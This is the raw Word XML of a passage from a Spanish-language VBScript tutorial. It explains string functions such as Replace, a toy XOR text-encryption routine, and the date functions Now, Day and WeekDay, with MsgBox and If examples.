              </w:rPr>
              <w:t>Replace(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Variable,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todos", "ella", vbTextCompare)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5311"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Hola a todos. Tras aplicarle la función</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Replace</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> a Variable, Variable2 obtiene la cadena Hola a ella.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="360"/>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Bueno, esto es todo de las funciones de cadena más comunes e importantes. Solo quedan las de tiempo, pero antes de verlas, quiero mostrar un ejemplo del uso conjunto de estas funciones mediante la sentencia Función estudiada anteriormente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="14" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="15" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="5" w:space="0" w:color="000000"/>
        </w:pBd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encriptar(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>texto,clave</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8597" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="5" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8597"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1461"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8597" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="15" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="5" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="5241"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On error resume next: Dim i    For i = 1 To Len(texto)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1932"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encriptar = encriptar &amp; </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Asc(Mid(texto,i, 1)) Xor clave)    Nex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tc>
      </w:tr>
    </w:tbl>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a función encripta un texto al aplicarle una clave y desencripta un texto encriptado al introducirle la misma clave. Para usarla hay que poner: Variable=encriptar("Hola",3) donde "Hola" es una cadena entre comillas y 3 un valor numérico entero sin comillas que representa la clave de encriptación. Al usar esto Variable obtendrá Klob y si haces Variable=encriptar("Klob",3), Variable obtendrá Hola. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Fíjate que en los dos casos debe estar la misma clave (3). </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este es un ejemplo de los muchos que se pueden hacer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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último, quedan funciones que trabajan con el tiempo. La principal de ellas, y su bas es la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Now</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lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Now</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sirve </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">obtener la fecha y hora actuales </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y guardarla en una</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variable (que lo recibe como un valor alfanumérico o de cadena). Se expresa de la siguiente forma:</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Variable = Now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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mos, esta función carece de argumentos, y por lo tanto se trata de una palabra que no puede ser usada para definir una variable. Esto se puede combinar con un </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:b/>
            <w:u w:val="single" w:color="000000"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MsgBox</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de la manera siguiente, para poder ver que valor nos da la función:</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 xml:space="preserve">Variable = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MsgBox(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Now,0,"Fecha y hora")</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te ejemplo daría como resultado el valor de cadena mostrado en la siguiente imagen:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3358"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1256030" cy="1075690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1256030" cy="1075690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="322"/>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anterior, como Now guarda la fecha y hora en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>formato alfanumérico</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se podría operar con este valor con los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>operadores de cadena</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Aparte también, la función Now tiene sus propios </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>operadores de tiempo</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que lo pueden modificar para que guarde solo la hora, el minuto, el año, u otros datos concretos y no solo la parrafada anterior... En estos casos la función Now guardaría el valor como un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>valor numérico y de cadena a la vez,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por lo que se podría modificar </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>primero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>operadores de numeros</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 xml:space="preserve">luego </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>con los de cadena. Un ejemplo de esto es el siguiente</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>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Day(Now)</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Sqr(Variable)+1</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3 = StrReverse(Variable2&amp;Variabl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4 = MsgBox(Variable3,0,"Numero")</w:t>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La tarea de este código es la siguiente </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(se que no he explicado las funciones aún, pero no tardaré, es para que veáis que se le puede tratar de diversas formas):</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Primero, averigua el día de hoy (un numero) y lo guarda en Variable. Luego, coge el valor de Variable y le aplica la raíz cuadrada sumándole una unidad al resultado y lo guarda en Variable2. Mas tarde coge el valor de Variable2 y Variable y los une, para luego invertir el orden de sus cifras y guardarlo en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Variable3. (Los une de forma que si por ejemplo Variable2 es 3,44 y Variable es 10, el número final obtenido es 3,4410) Por ultimo abre un </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:u w:val="single" w:color="000000"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>MsgBox</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y muestra el valor de Variable3, para ver el resultado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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ambién se puede combinar la función Now con la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">sentencia If </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para hacer que un trozo del script solo aparezca un día determinado, o un mes concreto... A continuación un ejemplo de uso de la función Now modificada por el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>operador de Día</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con la </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>sentencia</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t xml:space="preserve">If </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">para que el </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t xml:space="preserve">MsgBox </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>solo aparezca el día 5 de cada mes (repito que el operador de día lo explicaré ya enseguida):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4204"/>
        <w:gridCol w:w="4497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1461"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4204"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Day(Now)</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 = 5 Then</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 xml:space="preserve">"Hoy es dia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5",0,"Fecha")</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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="14" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="5" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>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verigua el día y lo guarda en Variabl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Comprueba si Variable es 5.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="60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i Variable es 5 muestra un mensaje Fin de la condición.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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ta forma podemos jugar con la fecha y crear eventos temporales (bucles que se repitan x segundos, mensajes que aparezcan días determinados, etc…). Pero no voy a entretenerme más, lo prometido es deuda. La </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Now</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiene a su vez varias funciones que la pueden modificar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>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primera función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Day, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que la hemos utilizado en los ejemplos anteriores. Esta función hace que la función Now de solamente un valor numérico que representa el día del mes. Es decir, si estamos a 23 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Marzo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, esta función dará el valor 23. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8243" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2216"/>
        <w:gridCol w:w="6027"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="357"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2216"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Day(</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602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día.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>
        <w:ind w:left="93" w:right="165"/>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gunda función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WeekDay</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función hace que la función Now de solamente un valor numérico que representa el día de la semana. Es decir, si estamos a lunes 23 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Marzo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, esta función dará el valor 1 mientras que si estamos en domingo, el valor que devolverá será 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="9" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2282"/>
        <w:gridCol w:w="6419"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258"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WeekDay(</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2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6443"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w:t>
            </w:r>
